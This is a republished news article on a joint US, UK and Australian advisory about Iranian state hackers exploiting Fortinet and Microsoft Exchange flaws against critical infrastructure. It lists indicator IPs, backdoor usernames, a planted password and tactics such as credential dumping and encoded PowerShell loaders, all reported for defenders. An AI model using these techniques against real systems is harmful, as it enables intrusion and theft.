HomeTechnologyIranian Hackers Are Going After US Critical Infrastructure

Iranian Hackers Are Going After US Critical Infrastructure


master mentalism tricks

Organizations responsible for critical infrastructure in the US are in the crosshairs of Iranian government hackers, who are exploiting known vulnerabilities in enterprise products from Microsoft and Fortinet, government officials from the US, UK, and Australia warned on Wednesday.

A joint advisory published Wednesday said an advanced-persistent-threat hacking group aligned with the Iranian government is exploiting vulnerabilities in Microsoft Exchange and Fortinet’s FortiOS, which forms the basis for the latter company’s security offerings. All of the identified vulnerabilities have been patched, but not everyone who uses the products has installed the updates. The advisory was released by the FBI, US Cybersecurity and Infrastructure Security Agency, the UK’s National Cyber Security Center, and the Australian Cyber Security Center.

A Broad Range of Targets

“The Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple US critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations,” the advisory stated. “FBI, CISA, ACSC, and NCSC assess the actors [that] are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.”

The advisory said the FBI and CISA have observed the group exploit Fortinet vulnerabilities since at least March and Microsoft Exchange vulnerabilities since at least October to gain initial access to systems. The hackers then initiate follow-on operations that include deploying ransomware.

In May, the attackers targeted an unnamed US municipality, where they likely created an account with the username “elie” to further burrow into the compromised network. A month later, they hacked a US-based hospital specializing in health care for children. The latter attack likely involved Iranian-linked servers at 91.214.124[.]143, 162.55.137[.]20, and 154.16.192[.]70.

Last month, the APT actors exploited Microsoft Exchange vulnerabilities that gave them initial access to systems in advance of follow-on operations. Australian authorities said they also observed the group leveraging the Exchange flaw.

Watch Out for Unrecognized User Accounts

The hackers may have created new user accounts on the domain controllers, servers, workstations, and active directories of networks they compromised. Some of the accounts appear to mimic existing accounts, so the usernames are often different from targeted organization to targeted organization. The advisory said network security personnel should search for unrecognized accounts with special attention on usernames such as Support, Help, elie, and WADGUtilityAccount.

The advisory comes a day after Microsoft reported that an Iranian-aligned group it calls Phosphorous is increasingly using ransomware to generate revenue or disrupt adversaries. The group employs “aggressive brute force attacks” on targets, Microsoft added.

Early this year, Microsoft said, Phosphorus scanned millions of IP addresses in search of FortiOS systems that had yet to install the security fixes for CVE-2018-13379. The flaw allowed the hackers to harvest clear-text credentials used to remotely access the servers. Phosphorus ended up collecting credentials from more than 900 Fortinet servers in the US, Europe, and Israel.

More recently, Phosphorus shifted to scanning for on-premises Exchange Servers vulnerable to CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, a constellation of flaws that go under the name ProxyShell. Microsoft fixed the vulnerabilities in March.

“When they identified vulnerable servers, Phosphorus sought to gain persistence on the target systems,” Microsoft said. “In some instances, the actors downloaded a Plink runner named MicrosoftOutLookUpdater.exe. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.”

Identifying High-Value Targets

The Microsoft blog post also said that, after gaining persistent access, the hackers triaged hundreds of victims to identify the most interesting targets for follow-on attacks. The hackers then created local administrator accounts with the username “help” and the password “_AS_@1394.” In some cases, the actors dumped LSASS to acquire credentials to be used later.

Microsoft also said that it observed the group using Microsoft’s BitLocker full-disk encryption feature, which is designed to protect data and prevent unauthorized software from running.

Read The Full Article Here


trick photography
Advertisingfutmillion

Popular posts

Mark Jenkin and Mia Hansen-Løve will unveil new films at
The trailer for Shin Ultraman keeps Japan at the top
Playground review – Stylised agony that slowly loses its impact
Take a look at Cartoon Saloon’s new animated feature My
Watch Outlander Online: Season 6 Episode 7
‘The Challenge: All Stars’ Season 3: Meet the Cast (PHOTOS)
Bill Hader Talks Getting Back Into Character for ‘Barry’ Season
‘General Hospital’: Father’s Day Comes Early as Ned Adopts Olivia’s
“Irradiance” At The Paramount Hudson Valley Theater In Peekskill, NY Sunday May 22nd, 2022 3 PM ET Presented By The Daisy Jopling Music Mentorship Foundation
KISS’ Paul Stanley Auctioning Off 2022 Chevy Corvette Stingray
Hayley Williams Joins Billie Eilish for ‘Misery Business,’ ‘Happier Than
15 Things We Miss About the Gen-X Music Experience
Dove Cameron’s Corset Comes in the Shape of a Broken
17 Best Hair Masks For Speedy Damage Recovery
“Euphoria”-Inspired Fashion Will Be Everywhere This Festival Season
Hailey Bieber Wore the Comfortable Legging Trend Everyone Should Own
Tif Marcelo Combines Tropes With a Moving Marriage-of-Convenience-in-Trouble Romance
Beacon Audiobooks Releases “Baseball’s Greatest What If” Written by Author Dan Joseph
11 LGBTQ Books Every High School Library Should Have
Fantasy Romance Novels To Fall in Love With
How toddler-mother attachment impacts adolescent brain and behavior
Medical dressing works like duct tape to seal internal wounds
Flying robot generates as much power as a flapping insect
Anxious and neurotic personality traits linked to ASMR sensations
Ukraine War Prompts Europe’s New Emergency Rules for the Internet
TSMC Agrees to Join Taiwan in Enforcing Sanctions on Russia
How Elon Musk Won Twitter
Google Fiber Workers Vote to Unionize